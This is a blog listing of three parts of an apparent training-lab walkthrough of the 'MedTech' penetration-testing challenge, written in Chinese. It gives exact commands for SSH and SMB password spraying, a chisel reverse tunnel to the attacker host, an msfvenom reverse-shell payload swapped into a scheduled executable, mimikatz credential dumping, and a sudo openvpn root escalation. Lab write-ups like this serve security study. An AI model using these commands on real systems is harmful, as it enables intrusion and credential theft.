發表文章

目前顯示的是有「Medtech」標籤的文章

Challenge 1 - Medtech(5)

圖片
 Challenge 1 - Medtech(5) 上一階段完成了 MedTech 這個 LAB 的所有 Windows 主機 剩下兩台 Linux 主機,一台在外網一台在內網 先將目標放在外網這一台 Linux 主機(.120) 這一台之前枚舉過僅有 22,80 Port,80 是一個 PAW 站台且找不到洞進去 現階段將目標放到 22 Port,拿到了不少的帳號密碼,進行密碼噴灑後一樣沒有結果 所以將目標放到已經打下來的 Windows 機器上查找看看有無新發現 在 DC01 伺服器 Administrator 的桌面有發現一個檔案 credentials.txr 內容發現一組帳號密碼 web01: offsec/century62hisan51 這組帳號密碼測試後發現可以登入 .120 └─$ hydra -l offsec -p century62hisan51 ssh://192.168.185.120                ssh offsec@192.168.185.120 直接進去了,whoami & id 不是管理者也沒有 local.txt 開始 PE,cat /etc/passwd sudo -l 發現可以執行所有指令,直接 su 後輸入 offsec 密碼變更為 root,拿取 flag 更新攻擊列表,剩下最後一台內網的 Linux 主機 透過 .121 將 kali 的 2222 Port 對應到 172.16.185.14 的 22 Port wmic process call create "C:\users\joe\desktop\chisel.exe client 192.168.45.188:8080 R:2222:172.16.185.14:22" 開始密碼噴灑測試,└─$ hydra -L ./usernames.txt -P ./passwords.txt ssh://127.0.0.1 -s 2222 -V 沒有發現有用的帳號密碼 之前在外部 Linux 主機 (.122) 有發現一組 mario 的 id_rsa 測試後發現可以直接登入到內網的 .14 Linux 主機 └─$ proxychains4 -q...

Challenge 1 - Medtech(4)

圖片
 Challenge 1 - Medtech(4) 之前跑 BloodHound 發現 DEV04 看來是個有效入侵到 DC 的好跳板 因為在該機器上有個 Leon 的 Session,所以將下一步攻擊順序放在這一台 直接用現有的帳號密碼噴灑試試看 └─$ proxychains4 -q crackmapexec smb 172.16.155.12 -u ./usernames.txt -p ./passwords.txt --continue-on-success offsec & joe 是已知的帳號密碼,但其他帳號顯示 Locked 看來 Try 太多帳號密碼了 將 LAB 重開單獨測試目前已知的另外一組網域帳號 wario 試試看 一樣有用但不是管理者 多做幾次測試後發現網域帳號 yoshi 的密碼也是 Mushroom! 隨手好習慣先更新一下帳號密碼表 接著在列舉與測試時要多種列舉,發現 .12 有開 RDP 結果使用者帳號 yoshi:Mushroom! RDP 直接進去了,沒有做不到只有想不到 └─$ proxychains4 xfreerdp /u:yoshi /d:medtech.com /v:172.16.155.12:3389 /p:'Mushroom!' 拿到 local.txt flag PE 發現在 C:\ 路徑下有一個 TEMP 資料夾,裡面有一個 backup.exe 查看一下權限 icacls backup.exe 發現有 (M) 的權限 標準作業建立 Payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.227 LPORT=4445 -f exe -b '\x00\x0d\x0a' -o backup.exe 重新命名 backup.exe 再上傳 payload 結果 4445 listener 進來了,看來 backup.exe 是固定時間執行的 whoami 確認是管理者後拿 flag 更新一下攻擊列表 上傳 mimikatz.exe 並執行 privilege::debug、sekurlsa::logonpasswords 看到 yoshi 的 HASH 跟 wario 一樣,因為兩個的密碼都是 Mush...

Challenge 1 - Medtech(3)

圖片
 Challenge 1 - Medtech(3) 目前以列舉所有網域使用者清單,下一個目標放到外網的 .122 Linux 主機 一樣先執行 Rustscan,└─$ rustscan -a 192.168.155.122 --scripts none --ulimit 5000 | tee rustscan snmp 測試,└─$ sudo nmap -sU -p 161 192.168.155.122 | tee snmp nmap,└─$ sudo nmap -sCV -A -p 22,1194 192.168.155.122 | tee nmap Exploit-DB 針對 1194 Port OpenVPN 僅有一個 Denial of Service 看來沒用 Google 搜尋相關 1194 Port 與 OpenVPN 也沒有看到 RCE 所以這一台 Linux 要進去看來要改由 22 Port 帳號密碼下手 測試現有的帳號密碼噴灑試試看 └─$ hydra -L ./usernames.txt -P ./passwords.txt ssh://192.168.155.122 -V 獲得一組 offsec:password 直接測試 ssh 登入看看,確認可以登入但是是一個被限制的 shell 跳出改用 -t "bash --noprofile" 登入試試看,發現不給登入 改用原本的登入方式,輸入 sudo 看看,結果直接被登出 改用 sudo -l 發現可以不用密碼執行 openvpn,但沒甚麼用 執行相關有限的指令,在 history 看到會定期執行 sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh' 跟著執行看看,發現就 root 了,flag 也都可以直接拿到 更新攻擊列表進度如下 繼續在這一台 vpn 伺服器上枚舉看看有無新的發現 cat /etc/passwd,帳號是已知的 offsec、marto 在 mario 的 hoem 目錄底下發現 id_rsa 拿來測試登入 .122 試試看,發現還要密碼,目前不知道 mario 的密碼所以無法登入 先保留這一組 id_rsa,搞不好其他機器可以登入 後續沒有找到其他有用的資訊,...